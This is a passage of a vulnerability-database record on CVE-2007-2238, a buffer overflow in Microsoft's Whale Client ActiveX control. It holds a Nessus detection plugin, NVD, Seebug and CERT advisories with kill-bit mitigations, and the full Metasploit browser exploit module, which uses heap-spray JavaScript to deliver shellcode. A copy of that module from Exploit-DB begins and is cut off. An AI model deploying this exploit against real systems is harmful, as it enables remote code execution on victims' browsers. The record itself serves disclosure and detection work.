script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 43}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 6, "lastseen": "2019-02-21T01:11:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2018-08-10T17:13:33", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 28}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-10T17:13:33"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "b653856ccee7386f956205a29a7ed534"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "7a6f822b42e02a0c9da785674dc81360"}, {"key": "href", "hash": "6d284b5ee9a2896b99ca4ed3478bd4d1"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "aea23489ce3aa9b6406ebb28e0cda430"}, {"key": "pluginID", "hash": "d4c25866b8b36bc41e646cbb2f4efdd3"}, {"key": "published", "hash": "c07e25d141000fd1f654a48a4da4334f"}, {"key": "references", "hash": "62035ad14892310feb62a59b29171a8e"}, {"key": "reporter", "hash": "d4cd6666f171eea3a0b59e991e7695df"}, {"key": "sourceData", "hash": "46d2f7c8cafd8aab29cadb7d894022e3"}, {"key": "title", "hash": "7c1f8bce53687c065402b4e712a43db5"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7c5064430f58f59871cf9d488120f405a1bec7b3ffd15b25fda87ed87ab7bcd7", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2238"]}, {"type": "seebug", "idList": ["SSV:5062", "SSV:5070"]}, {"type": "cert", "idList": ["VU:789121"]}, {"type": "exploitdb", "idList": ["EDB-ID:16608"]}, {"type": "d2", "idList": ["D2SEC_MSIAG"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82980"]}, {"type": "kaspersky", "idList": ["KLA10392"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"]}], "modified": "2019-11-03T12:38:43"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-11-03T12:38:43"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "naslFamily": "Windows", "pluginID": "38734", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the Whale Client Components ActiveX control (WhlMgr.dll), as used in Microsoft Intelligent Application Gateway (IAG) before 3.7 SP2, allow remote attackers to execute arbitrary code via long arguments to the (1) CheckForUpdates or (2) UpdateComponents methods.", "modified": "2017-07-29T01:31:00", "id": "CVE-2007-2238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2238", "published": "2009-04-16T15:12:00", "title": "CVE-2007-2238", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:53:29", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34532\r\nCVE(CAN) ID: CVE-2007-2238\r\n\r\nMicrosoft\u7684Intelligent Application Gateway\uff08IAG\uff092007\u662f\u5168\u9762\u7684\u8fdc\u7a0b\u8bbf\u95ee\u7f51\u5173\uff0c\u63d0\u4f9b\u57fa\u4e8eSSL\u7684\u5e94\u7528\u7a0b\u5e8f\u8bbf\u95ee\u3001\u4fdd\u62a4\u548c\u7aef\u70b9\u5b89\u5168\u7ba1\u7406\u3002\r\n\r\nIAG\u6240\u4f7f\u7528\u7684Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6\uff08\u7531WhlMgr.dll\u6587\u4ef6\u63d0\u4f9b\uff09\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u5bf9CheckForUpdates()\u548c UpdateComponents()\u65b9\u5f0f\u6240\u4f20\u9001\u7684\u8f93\u5165\u53c2\u6570\u3002\u5982\u679c\u7528\u6237\u53d7\u9a97\u8bbf\u95ee\u4e86\u6076\u610f\u7f51\u9875\u5e76\u5411\u4e0a\u8ff0\u65b9\u5f0f\u63d0\u4f9b\u4e86\u8d85\u957f\u8f93\u5165\u53c2\u6570\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u6808\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMicrosoft Intelligent Application Gateway 2007 3.7\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728IE\u4e2d\u7981\u7528Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6ActiveX\u63a7\u4ef6\uff0c\u4e3a\u4ee5\u4e0bCLSID\u8bbe\u7f6ekill bit\uff1a\r\n\r\n{8D9563A9-8D5F-459B-87F2-BA842255CB9A}\r\n\r\n\u6216\u5c06\u4ee5\u4e0b\u6587\u672c\u4fdd\u5b58\u4e3a.REG\u6587\u4ef6\u5e76\u5bfc\u5165\uff1a\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{8D9563A9-8D5F-459B-87F2-BA842255CB9A}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://technet.microsoft.com/en-us/library/dd282918(printer).aspx target=_blank rel=external nofollow>http://technet.microsoft.com/en-us/library/dd282918(printer).aspx</a>", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5062", "id": "SSV:5062", "title": "Microsoft IAG 2007 ActiveX\u63a7\u4ef6\u6808\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:52:44", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34532\r\nCVE ID\uff1aCVE-2007-2238\r\nCNCVE ID\uff1aCNCVE-20072238\r\n\r\nMicrosoft Intelligent Application Gateway\u662f\u4e00\u6b3e\u667a\u80fd\u5e94\u7528\u7a0b\u5e8f\u7f51\u5173\uff0c\u63d0\u4f9bSSL VPN\u529f\u80fd\u3002\r\nMicrosoft Whale Intelligent Application Gateway Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6ActiveX\u63a7\u4ef6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\nWhlMgr.dll\u6587\u4ef6\u63d0\u4f9b\u7684\u63a7\u4ef6\u5904\u7406CheckForUpdates()\u548cUpdateComponents()\u65b9\u6cd5\u5b58\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nMicrosoft Intelligent Application Gateway 2007 3.7\n \u53ef\u4e0b\u8f7d\u4f7f\u7528\u5982\u4e0b\u5b89\u5168\u8865\u4e01\uff1a\r\nMicrosoft Intelligent Application Gateway 2007 3.7\r\nMicrosoft Microsoft Whale Communications Intelligent Application Gateway 2007 Service Pack 2\r\n<a href=http://www.microsoft.com/downloads/details.aspx?FamilyID=e69dfd1d-d333 target=_blank rel=external nofollow>http://www.microsoft.com/downloads/details.aspx?FamilyID=e69dfd1d-d333</a> -4c27-9246-279ada224317&displaylang=en", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5070", "id": "SSV:5070", "title": "Microsoft IAG 2007 ActiveX\u63a7\u4ef6\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "cert": [{"lastseen": "2019-10-09T19:50:24", "bulletinFamily": "info", "description": "### Overview \n\nThe Microsoft Whale Intelligent Application Gateway Whale Client Components ActiveX control contains multiple stack buffer overflows, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nWhale Communications Intelligent Application Gateway is an application that provides SSL VPN functionality. The Whale Client Components, which is provided by the file `WhlMgr.dll`, contains stack buffer overflow vulnerabilities in the `CheckForUpdates()` and `UpdateComponents()` methods. Note that Whale Communications is a subsidiary of Microsoft. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause the web browser to crash. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Service Pack 1 for both Whale Communications Intelligent Application Gateway (IAG) 3.6 and Microsoft Intelligent Application Gateway 2007. \n \n--- \n \n \n**Disable the Whale Client Components ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{8D9563A9-8D5F-459B-87F2-BA842255CB9A}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{8D9563A9-8D5F-459B-87F2-BA842255CB9A}]` \n`\"Compatibility Flags\"=dword:00000400` \nPlease note that setting the kill bit will break the Intelligent Application Gateway functionality. \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n--- \n \n### Vendor Information\n\n789121\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nNotified: December 14, 2006 Updated: May 27, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue is addressed in Service Pack 1 for both Whale Communications Intelligent Application Gateway (IAG) 3.6 and Microsoft Intelligent Application Gateway 2007.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23789121 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://technet.microsoft.com/en-us/library/dd282918.aspx>\n * <http://support.microsoft.com/kb/240797>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2238](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2238>) \n---|--- \n**Severity Metric:****** | 3.41 \n**Date Public:** | 2009-04-15 \n**Date First Published:** | 2009-04-15 \n**Date Last Updated: ** | 2009-05-27 18:12 UTC \n**Document Revision: ** | 16 \n", "modified": "2009-05-27T18:12:00", "published": "2009-04-15T00:00:00", "id": "VU:789121", "href": "https://www.kb.cert.org/vuls/id/789121", "type": "cert", "title": "Microsoft Whale Intelligent Application Gateway Whale Client Components ActiveX control stack buffer overflows", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:38", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/82980/Microsoft-Whale-Intelligent-Application-Gateway-ActiveX-Control-Buffer-Overflow.html", "id": "PACKETSTORM:82980", "type": "packetstorm", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Microsoft Whale Intelligent Application \nGateway Whale Client. When sending an overly long string to CheckForUpdates() \nmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute \narbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-2238' ], \n[ 'OSVDB', '53933'], \n[ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Apr 15 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# fluff.. \nfluff = rand_text_english(rand(20) + 1) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Set the return. \nret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('ComponentManager.Installer.1'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000); \nfor (index = 0; index < 15000; index++) { \nevil_string = evil_string + my_unescape('#{ret}'); \n} \nvulnerable.CheckForUpdates(evil_string,'#{fluff}'); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82980/mswhale_checkforupdates.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T00:14:52", "bulletinFamily": "exploit", "description": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow. CVE-2007-2238. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16608", "href": "https://www.exploit-db.com/exploits/16608/", "type": "exploitdb", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\r\n# $Id: mswhale_checkforupdates.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\r\n\t\t\t\tGateway Whale 